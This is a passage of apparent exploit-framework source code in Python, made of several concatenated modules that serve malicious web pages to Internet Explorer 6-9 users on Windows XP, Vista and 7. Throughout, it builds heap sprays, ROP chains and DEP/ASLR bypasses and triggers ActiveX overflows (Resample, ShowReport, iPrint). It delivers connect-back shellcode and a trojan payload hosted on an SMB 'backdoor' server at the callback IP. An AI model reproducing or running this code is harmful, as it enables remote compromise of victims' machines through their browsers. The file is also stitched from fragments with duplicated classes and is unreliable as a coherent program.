self.log('WP> Serving Windows XP IE8 exploit')
return self.makefileIE8_XP()
if osversion == "Windows 7":
if browser == "MSIE 8.0":
self.log('WP> Serving MSIE 8.0 exploit')
return self.makefileIE8_W7Vista()
if browser == "MSIE 9.0":
self.log('WP> Serving MSIE 9.0 exploit')
return self.makefileIE9_W7Vista()
if osversion == "Windows Vista":
if browser == "MSIE 7.0":
self.log('WP> Serving MSIE 7.0 exploit')
return self.makefileIE7_Vista()
if browser == "MSIE 8.0":
self.log('WP> Serving MSIE 8.0 exploit')
return self.makefileIE8_W7Vista()
if browser == "MSIE 9.0":
self.log('WP> Serving MSIE 9.0 exploit')
return self.makefileIE9_W7Vista()
self.log('WP> Invalid target')
return
def makefileIE7_Vista(self):
payload = "\x8B\xE0" # MOV ESP,EAX
payload += "\x83\xC4\x11" # ADD ESP,11
payload += self.shellcode
payload += wp_randomstring((5120 - len(payload)))
filedata = """<html>
<head>
<script>"""
script = wp_clientside_HeapLib(padding="%u0c0c")
script += """
var heap_obj = new heapLib.ie(0x20000);
var nops = unescape("NOPS");
var code = unescape("SHELLCODE");
while (nops.length < 0x2000) nops += nops;
var offset = nops.substring(0, 0x5FA);
var shellcode = offset + code + nops.substring(0, 0x1000-code.length-offset.length);
while (shellcode.length < 0x82000) shellcode += shellcode;
var block = shellcode.substring(0, (0x82000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x300; z++) {
heap_obj.alloc(block);
}
"""
script = script.replace('SHELLCODE', wp_urluencode(payload))
script = script.replace('NOPS', wp_urluencode(pack('<L', 0x0c0c0c0c)))
# Obfuscate the script code (disabled for this exploit)
self.isClientD = False
if self.isClientD:
self.log("WP> Running jsObfuscator")
filedata += self.jsObfuscator.obfuscate(script)
else:
filedata += script
# Add the reset of the filedata
filedata += """</script>
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "%s";
</script>
<iframe src="%s"></iframe>
</body>
</html>
""" % (wp_randomstring(1), self.filename2)
return filedata
def makefileIE8_W7Vista(self):
payload = pack('<L', 0x7C343BD9) # ret
payload += pack('<L', 0x7C343BD8) # pop edx
payload += pack('<L', 0x7C348B05) # xchg eax, esp
payload += self.wp_sayonaraASLRDEPBypass(len(self.shellcode) + 8)
payload += self.shellcode
payload += wp_randomstring((5120 - len(payload)))
filedata = """<html>
<head>
<script>"""
script = wp_clientside_HeapLib(padding="%u0c0c")
script += """
var heap_obj = new heapLib.ie(0x20000);
var nops = unescape("NOPS");
var code = unescape("SHELLCODE");
while (nops.length < 0x2000) nops += nops;
var offset = nops.substring(0, 0x5F4);
var shellcode = offset + code + nops.substring(0, 0x1000-code.length-offset.length);
while (shellcode.length < 0x80000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x300; z++) {
heap_obj.alloc(block);
}
"""
script = script.replace('SHELLCODE', wp_urluencode(payload))
script = script.replace('NOPS', wp_urluencode(pack('<L', 0x0c0c0c0c)))
# Obfuscate the script code (disabled for this exploit)
self.isClientD = False
if self.isClientD:
self.log("WP> Running jsObfuscator")
filedata += self.jsObfuscator.obfuscate(script)
else:
filedata += script
# Add the reset of the filedata
filedata += """</script>
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "%s";
</script>
<iframe src="%s"></iframe>
</body>
</html>
""" % (wp_randomstring(1), self.filename2)
return filedata
def makefileIE9_W7Vista(self):
payload = pack('<L', 0x0c0c0c0c)
payload += pack('<L', 0x7C343BD9) # ret
payload += pack('<L', 0x7C343BD8) # pop edx
payload += pack('<L', 0x7C348B05) # xchg eax, esp
payload += self.wp_sayonaraASLRDEPBypass(len(self.shellcode) + 8)
payload += self.shellcode
payload += wp_randomstring((5120 - len(payload)))
filedata = """<html>
<head>
<script>"""
script = wp_clientside_HeapLib(padding="%u0c0c")
script += """
function randomblock(blocksize){
var theblock = "";
for (var i = 0; i < blocksize; i++)
{
theblock += Math.floor(Math.random()*90)+10;
}
return theblock
}
function tounescape(block)
{
var blocklen = block.length;
var unescapestr = "";
for (var i = 0; i < blocklen-1; i=i+4)
{
unescapestr += "%u" + block.substring(i,i+4);
}
return unescapestr;
}
var heap_obj = new heapLib.ie(0x20000);
var nops = unescape("NOPS");
var code = unescape("SHELLCODE");
while (nops.length < 0x80000) nops += nops;
for (var i=0; i < 0x1000; i++) {
var padding = unescape(tounescape(randomblock(0x2000)));
while (padding.length < 0x2000) padding+= padding;
var junk_offset = padding.substring(0, 0x5FC);
var single_sprayblock = junk_offset + code + nops.substring(0, 0x1000 - code.length - junk_offset.length);
while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
heap_obj.alloc(sprayblock);
}
"""
script = script.replace('SHELLCODE', wp_urluencode(payload))
script = script.replace('NOPS', wp_urluencode(pack('<L', 0x0c0c0c0c)))
# Obfuscate the script code (disabled for this exploit)
self.isClientD = False
if self.isClientD:
self.log("WP> Running jsObfuscator")
filedata += self.jsObfuscator.obfuscate(script)
else:
filedata += script
# Add the reset of the filedata
filedata += """</script>
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "%s";
</script>
<iframe src="%s"></iframe>
</body>
</html>
""" % (wp_randomstring(1), self.filename2)
return filedata
def makefileIE8_XP(self):
payload = pack('<L', 0x77C3B861)
payload += pack('<L', 0x77C3B860)
payload += pack('<L', 0x77C3A891)
payload += self.wp_UniversalDEPBypassWinXP_VP(
len(self.shellcode) + 512)
payload += self.shellcode
# heap chunk = 4096 bytes, canvas sc's vary between < & > 4096 so we add padding to consistantly use two chunks per block
payload += wp_randomstring((5120 - len(payload)))
filedata = """<html>
<head>
<script>"""
script = wp_clientside_HeapLib(padding="%u0c0c")
#script code
script += """
var heap_obj = new heapLib.ie(0x20000);
var nops = unescape("NOPS");
var code = unescape("SHELLCODE");
while (nops.length < 0x2000) nops += nops;
var offset = nops.substring(0, 0x5F4);
var shellcode = offset + code + nops.substring(0, 0x1000-code.length-offset.length);
while (shellcode.length < 0x80000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < 0x300; z++) {
heap_obj.alloc(block);
}
"""
script = script.replace('SHELLCODE', wp_urluencode(payload))
script = script.replace('NOPS', wp_urluencode(pack('<L', 0x0c0c0c0c)))
#Obfuscate the script code (disabled for this exploit)
self.isClientD = False
if self.isClientD:
self.log("WP> Running jsObfuscator")
filedata += self.jsObfuscator.obfuscate(script)
else:
filedata += script
filedata += """</script>
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "%s";
</script>
<iframe src="%s"></iframe>
</body>
</html>
""" % (wp_randomstring(1), self.filename2)
return filedata
def makefile2(self):
filedata = """<html>
<script>
function funcB() {
document.execCommand("selectAll");
};
function funcA() {
document.write("%s");
parent.arrr[0].src = "%s\\u0c08\\u0c0c%s";
}
</script>
<body onload='funcB();' onselect='funcA()'>
<div contenteditable='true'>
.
</div>
</body>
</html>
""" % (wp_randomstring(1), wp_randomstring(4), wp_randomstring(58))
return filedata
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
cookies = clientheader.getStrValue(['Cookie'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
if clientheader.URL.count(self.filename):
data = self.makefile(browser, osversion)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
elif clientheader.URL.count(self.filename2):
self.log('WP> Serving Exploit Stage 2')
data = self.makefile2()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def run(self):
self.log('WP> This module must be run via HTTPSERVER')
return 0
class theexploit(wp_exploit, httpclientside):
PAYLOADS = [
"IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN",
"Execute Command"
]
DEFAULT_PAYLOAD = 2
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
self.alignstack = True
self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c"
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".htm"
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
self.vProtect = True
self.useRawShellcode = True
self.payloadFilename = "".join(
[random.choice(string.lowercase) for x in range(8)]) + '.exe'
self.sharefilename = "\\" + "".join(
[random.choice(string.lowercase)
for x in range(4)]) + "\\" + self.payloadFilename
return
def is_vulnerable(self, info_dict):
"""
Check for IE
"""
self.isClientD = True
if "MSIE" in info_dict['user_agent']:
self.log("WP> Target has MSIE")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0]
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
self.log('WP> Targeting version %d: %s' %
(self.version, targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
if getattr(self, 'useSSLMOSDEF', False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
self.wp_getShellcodeType()
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def makefile(self):
payload = "\\\\" + self.callback.ip + self.sharefilename
filedata = """<html>
<object classid='clsid:209EBDEE-065C-11D4-A6B8-00C04F0D38B7' id='target'/></object>
<script language='vbscript'>
target.ShowReport "PAYLOAD"
</script>
</html>
""".replace('PAYLOAD', payload)
return filedata
def makesmb(self):
self.log("WP> Starting wp_smbserver_backdoor to host payload")
try:
app = self.engine.getModuleExploit("wp_smbserver_backdoor")
app.link(self)
app.argsDict['sharefilename'] = self.sharefilename
app.argsDict['trojanPayload'] = self.shellcode
ret = app.run()
except:
self.log(
"WP> Unable to start wp_smbserver_backdoor - port 443 already bound?"
)
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return None, None
time.sleep(5)
return
def makesploit(self, clientheader, clientbody):
self.createShellcode()
self.makesmb()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit file')
data = self.makefile()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def run(self):
self.makesmb()
filedata = self.makefile()
outputfile = wp_outputpath(self.filename)
self.log("WP> Opening %s for output" % outputfile)
fd = file(outputfile, 'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s' % (outputfile))
return 1
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s############################################################
PAYLOADS=["IE Inject Connect Back",
"HTTPMOSDEF SSL",
"HTTPMOSDEF PLAIN",
"Execute Command"]
# Clienside exploits default to HTTPMosdef PLAIN for clientD
DEFAULT_PAYLOAD = 2
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.use_universal = True
# We default these to false
self.HTTPMOSDEF = False
self.useSSLMOSDEF = False
self.isClientD = False
self.badstring='' # Shellcode is on heap or in dll
#Randomise name for clientd
self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
# For IE7 .Net Shellcode
self.pc = 0x44444444;
return
def is_vulnerable(self, info_dict):
# Called from ClientD, if recon modules are enabled
# returns a value used to rank the exploit within attacking modules
"""
Check for IE
"""
self.isClientD = True
if "MSIE" in info_dict['user_agent']:
self.log("WP> Target has MSIE")
language = info_dict['plugins'].get("language", "")
if type(language)==type([]):
language=language[0] # it's a list in actuality
self.log("WP> language found: %s"%language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets,"-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
#self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if getattr(self,'useSSLMOSDEF',False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
# Potentially called from httpserver update shellcode accordingly
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host=self.target.interface
self.filename=self.argsDict.get('filename',self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s'%(t,targets[t][0])
return
def heapSpray(self,payload,heapspraycode):
# This creates a heapspray of blocks that are 0x240000 (0x23f000 on Win7) in size
# almost gauruntees that our spray block sits at 0xxxxx1000 or other 100 byte boundary
heapprefix = wp_randomstring(220) # padding to 0x100 bytes
script = """
memory = new Array();
var hs = unescape("HEAPSPRAYCODE");
while(hs.length < 0x11F600) hs += hs;
hs = hs.substring(0, 0x11F600-DATALENGTH);
hs = unescape("PREFIX") + hs + unescape("PAYLOAD");
try{
for(var i = 0; i < 400; i++) {
memory[i]= hs.substring(0,hs.length);
}
}
catch(err)
{}
"""
script = script.replace('DATALENGTH',str( (0x100 + len(payload)) / 2 ))
script = script.replace('HEAPSPRAYCODE',wp_urluencode(heapspraycode))
script = script.replace('PREFIX',wp_urluencode(heapprefix))
script = script.replace('PAYLOAD',wp_urluencode(payload))
#Obfuscate the script code
if self.isClientD:
self.log("WP> Running jsObfuscator")
return self.jsObfuscator.obfuscate(script)
else:
return script
def makefileWinXP(self,browser):
# Exploit for Windows XP (DEP Bypass)
landingAddress = 0x126A1004
heapspraycode = pack('<L', 0x77c1c04e) # RETN
heapspraycode += pack('<L', landingAddress+4) # ptr
heapspraycode += pack('<L', 0x77c1c04e) # RETN MSVCRT
heapspraycode += pack('<L', 0x77c1c04e) # RETN
heapspraycode += pack('<L', 0x77c1c04e) # RETN
heapspraycode += pack('<L', 0x77c1f11d) # RETN 0C
heapspraycode += pack('<L', 0x77c1c04e) # RETN
heapspraycode += pack('<L', 0x77C3A634) # mov esp,ecx
while len(heapspraycode) < (0x100-8): # Build out to 0x100 byte blocks
heapspraycode += pack('<L', 0x77c1c04e) # RETN SLIDE
heapspraycode += pack('<L', 0x77c1f11d) # RETN 0C POP over above data
heapspraycode += pack('<L', 0x77c1c04e) # RETN
depbypass = pack('<L', 0x77c1c04e) * 10 # buffer of ret slides
depbypass += self.wp_UniversalDEPBypassWinXP_VP(len(self.shellcode)+8)
# Set the payload
payload = depbypass + wp_randomnops(4) + self.shellcode + ("\x00" * 100)
#pad the payload out to 0x100 bytes
payload += wp_randomstring(256 - (len(payload)%256))
filedata = """
<html>
<script language="JavaScript">
"""
# script heapspray code
filedata += self.heapSpray(payload,heapspraycode)
# Add the reset of the filedata
filedata+="""
</SCRIPT>
<object classid="clsid:3EEEBC9A-580F-46EF-81D9-55510266413D" id="target"></object>
<script language='vbscript'>
x="xxxx"
y=String(1060, "A") + unescape("%04%10%6a%12") + String(100, "C")
z=1
target.Resample x,y,z
</script>
</html>
"""
return filedata
def makefileIE8_VistaWin7(self):
# Exploit for IE 8 On Windows 7/Vista
# This page loads a .Net DLL
# mscorie .Net DLL ASLR/DEP Bypass
landingAddress = 0x126A1004
heapspraycode = pack('<L', 0x63F05761) # RETN
heapspraycode += pack('<L', landingAddress) # ptr
heapspraycode += pack('<L', 0x63F0575B) # MSCORIE:(0x63f0575b XCHG EAX,ESP)
heapspraycode += pack('<L', 0x63F01D9A) # POP ESI, RETN
heapspraycode += pack('<L', 0x63F05761) # RETN
heapspraycode += pack('<L', 0x63F05761) # RETN
heapspraycode += pack('<L', 0x63F0237E) # MSCOREIE: CALL DWORD PTR DS:[ECX+4]
while len(heapspraycode) < (0x100-8): # Build out to 0x100 byte blocks
heapspraycode += pack('<L', 0x63F05761) # RETN SLIDE
heapspraycode += pack('<L', 0x63F03E9B) # RETN 30 POP over above data
heapspraycode += pack('<L', 0x63F05761) # RETN
depbypass = pack('<L', 0x63F05761) * 12 # buffer of ret slides
# depbypass using mscorie
depbypass += self.wp_mscorieDEPBypass(len(self.shellcode)+104)
# Set the payload
payload = depbypass + wp_randomnops(4) + self.shellcode + ("\x00" * 100)
#pad the payload out to 0x100 bytes
payload += wp_randomstring(256 - (len(payload)%256))
filedata = """
<html>
<object classid="OURDLL" height="0" width="0"></object>
<script language="JavaScript">
"""
# script heapspray code
filedata += self.heapSpray(payload,heapspraycode)
# Add the reset of the filedata
filedata+="""
</SCRIPT>
<object classid="clsid:3EEEBC9A-580F-46EF-81D9-55510266413D" id="target"></object>
<script language='vbscript'>
x="xxxx"
y=String(1060, "A") + unescape("%04%10%6a%12") + String(100, "C")
z=1
target.Resample x,y,z
</script>
</html>
"""
filedata = filedata.replace('OURDLL', self.filename.replace('.html','.dll'))
return filedata
def makefileIE7(self):
# Exploit for IE 7
# Uses the old .Net 2.0 bypass ASLR method
landingAddress = 0x126A1004
heapspraycode = pack('<L', landingAddress) # ptr
heapspraycode += pack('<L', landingAddress) # ptr
heapspraycode += pack('<L', self.pc) # Return to .Net DLL code
heapspraycode += pack('<L', self.pc) # Return to .Net DLL code
heapspraycode += pack('<L', self.pc) # Return to .Net DLL code
heapspraycode += pack('<L', self.pc) # Return to .Net DLL code
heapspraycode += pack('<L', self.pc) # Return to .Net DLL code
while len(heapspraycode) < (0x100): # Build out to 0x100 byte blocks
heapspraycode += pack('<L', 0x63F05761) # JUNK
# Set the payload, payload is inside the loaded dll file
payload = ""
filedata = """
<html>
<object classid="OURDLL#a.b" height="0" width="0"></object>
<script language="JavaScript">
"""
# script heapspray code
filedata += self.heapSpray(payload,heapspraycode)
# Add the reset of the filedata
filedata+="""
</SCRIPT>
<object classid="clsid:3EEEBC9A-580F-46EF-81D9-55510266413D" id="target"></object>
<script language='vbscript'>
x="xxxx"
y=String(1060, "A") + unescape("%04%10%6a%12") + String(100, "C")
z=1
target.Resample x,y,z
</script>
</html>
"""
filedata = filedata.replace('OURDLL', self.filename.replace('.html','.dll'))
return filedata
def makefile(self,browser,osversion):
if osversion == "Windows XP":
self.log('WP> Serving Windows XP exploit')
return self.makefileWinXP(browser)
if browser == "MSIE 8.0":
self.log('WP> Serving MSIE 8.0 exploit')
return self.makefileIE8_VistaWin7()
if browser == "MSIE 7.0":
self.log('WP> Serving MSIE 7.0 exploit')
return self.makefileIE7()
# Default to a non ASLR version
self.log('WP> Serving Non ASLR Exploit')
return self.makefileWinXP(browser)
def makesploit(self,clientheader,clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header,body
h=header('SERVER')
b=body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s"%clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
# Get details
browser,osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
#self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit html file')
data=self.makefile(browser,osversion)
if not data:
return None,None
b.setBody(data)
h.addHeader('Content-Type','text/html')
h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('.dll')):
if browser == "MSIE 7.0":
self.log('WP> Serving IE7 .Net DLL file')
self.vProtect = True # Needed for this type of payload
p = PElib()
data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
self.vProtect = False # Reset this
else:
self.log('WP> Serving IE8 .Net DLL file')
p = PElib()
data = p.createDotNETPEFileBuf("", self.pc)
if not data:
return None,None
b.setBody(data)
h.addHeader('Content-Type','application/octet-stream')
else:
self.log('WP> Redirecting to self')
h.status='302'
h.addHeader('Location',self.filename)
h.addHeader('Content-Type','text/html')
self.log('WP> ****************************************')
return h,b
def run(self):
if (self.version == 0):
filedata=self.makefile('','Windows XP')
dlldata =""
elif (self.version ==1):
filedata=self.makefile('MSIE 7.0','')
self.vProtect = True # Needed for this type of payload
p = PElib()
dlldata = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
self.vProtect = False # Reset this
elif (self.version ==2):
filedata=self.makefile('MSIE 8.0','')
p = PElib()
dlldata = p.createDotNETPEFileBuf("", self.pc)
outputfile = wp_outputpath(self.filename)
self.log("WP> Opening %s"%outputfile )
fd=file(outputfile,'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s'%outputfile)
if dlldata != "":
dllfile = wp_outputpath(self.filename.replace('html','dll'))
# create the dll file
f = open(dllfile,'wb')
f.write(dlldata)
f.flush()
f.close
self.log('WP> Created DLL file %s'%dllfile)
return 1
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s############################################################
PAYLOADS = [
"IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN",
"Execute Command"
]
DEFAULT_PAYLOAD = 1
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.badstring = "\x00\x09\x0b\x0c\x0d\x0e\x0f\x20\x3e\x7a\xfc\xff"
#Ranomisze name for clientd
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def is_vulnerable(self, info_dict):
# Called from ClientD, returns a value used to rank the exploit within attacking modules
"""
Check for IE 6
"""
self.isClientD = True
if "MSIE 6.0" in info_dict['user_agent']:
self.log("WP> Target has MSIE 6")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0] #it's a list in actuality
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
self.log('WP> Targeting version %d: %s' %
(self.version, targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if self.isClientD:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def makefile(self):
# Make the exploit file
depBp = (
"\xB7\x29\x05\x5C"
"\x80\xF1\xFE\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
"\xF7\xF8\x07\x5C\xFF\xAE\x06\x5C\xB7\x29\x05\x5C\x56\x69\x72\x74"
"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x74\x30\x08\x5C"
"\xB7\x29\x05\x5C\x75\x61\x6C\x41\x11\x11\x11\x11\x11\x11\x11\x11"
"\x11\x11\x11\x11\x48\x65\x06\x5C\xB7\x29\x05\x5C\x6C\x6C\x6F\x63"
"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xBB\x01\x08\x5C"
"\xBF\xA1\x02\x5C\xBE\x01\x08\x5C\xB7\x29\x05\x5C\x38\xEA\x11\x5C"
"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x27\xF6\x07\x5C"
"\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
"\x11\x11\x11\x11\xB7\x29\x05\x5C\x80\xF1\xFE\xFF\x11\x11\x11\x11"
"\x11\x11\x11\x11\x11\x11\x11\x11\xF7\xF8\x07\x5C\xFF\xAE\x06\x5C"
"\xB7\x29\x05\x5C\x07\xE1\xFA\x4A\x11\x11\x11\x11\x11\x11\x11\x11"
"\x11\x11\x11\x11\x1A\x5A\x07\x5C\x11\x11\x11\x11\xC4\x36\x06\x5C"
"\x2E\xD5\x07\x5C\x90\x90\x90\x90\x90\x90\x90\x90\x7D\xD5\x02\x5C"
"\x47\x42\x05\x5C\xDA\x49\x02\x5C\xB7\x29\x05\x5C\x8D\x06\x04\x5C"
"\x11\x11\x11\x11\x16\xF0\x07\x5C\x11\x11\x11\x11\x64\xA7\x06\x5C"
"\x16\xF0\x07\x5C\x16\xF0\x07\x5C\x16\xF0\x07\x5C\x16\xF0\x07\x5C"
"\x82\x92\x02\x5C\x16\xF0\x07\x5C\x74\x30\x08\x5C\xB7\x29\x05\x5C"
"\xFF\xEF\xFF\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
"\xF7\xF8\x07\x5C\x9E\x7E\x02\x5C\xB8\x01\x08\x5C\xB7\x29\x05\x5C"
"\xC0\xFF\xFF\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
"\xF7\xF8\x07\x5C\xBE\x01\x08\x5C\x56\x5B\x06\x5C\x11\x11\x11\x11"
"\x11\x11\x11\x11\x11\x11\x11\x11\xC1\x01\x08\x5C\xC1\x01\x08\x5C"
"\x2E\x4B\x07\x5C\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22"
"\x22\x22\x22\x22\x11\x11\x11\x11\x11\x11\x11\x11\xC8\xC1\x06\x5C"
"\x5F\x6E\x07\x5C\xA5\x66\x06\x5C\x22\x22\x22\x22\x11\x11\x11\x11")
searchcode = wp_SearchCode(True)
depSc = 'c00kc00k'
depSc += depBp
depSc += self.shellcode
depSc += "11" * 100
payload = pack('<L', 0x5C0735C9) * 10 # ret
payload += depBp
payload += searchcode
payload += "C" * (56 - len(searchcode))
payload += pack('<L', 0x5C054CB2) # add esp,420
payload += "A" * 140
payload += "B" * 100
payload += "C" * 100
payload += "D" * 100
payload += "E" * 100
payload += "F" * 100
#Base filedata
filedata = """<html><body>
<object classid="clsid:36723f97-7aa0-11d4-8919-ff2d71d0d32c" id="iprint">
<param name=operation value=op-client-interface-version>
<param name=result-type value=url>
<param name=call-back-url value=PAYLOAD>
<param name=call-url value=SHELLCODE>
</body>
</html>
"""
filedata = filedata.replace('PAYLOAD', payload)
filedata = filedata.replace('SHELLCODE', depSc)
return filedata
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
self.log('WP> User agent of connecting host: %s' % user_agent)
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit file')
data = self.makefile()
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def run(self):
filedata = self.makefile()
self.log("WP> Opening %s for output" % (self.filename))
fd = file(self.filename, 'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s' % (self.filename))
return 1
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s############################################################
PAYLOADS=["IE Inject Connect Back",
"HTTPMOSDEF SSL",
"HTTPMOSDEF PLAIN",
"Execute Command"]
DEFAULT_PAYLOAD = 1
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.isClientD = False
self.use_universal = True
self.encode_printable = True
self.alignstack = True
self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c"
#Ranomisze name for clientd
self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
return
def is_vulnerable(self, info_dict):
# Called from ClientD, returns a value used to rank the exploit within attacking modules
"""
Check for IE 6
"""
self.isClientD = True
if "MSIE 6.0" in info_dict['user_agent']:
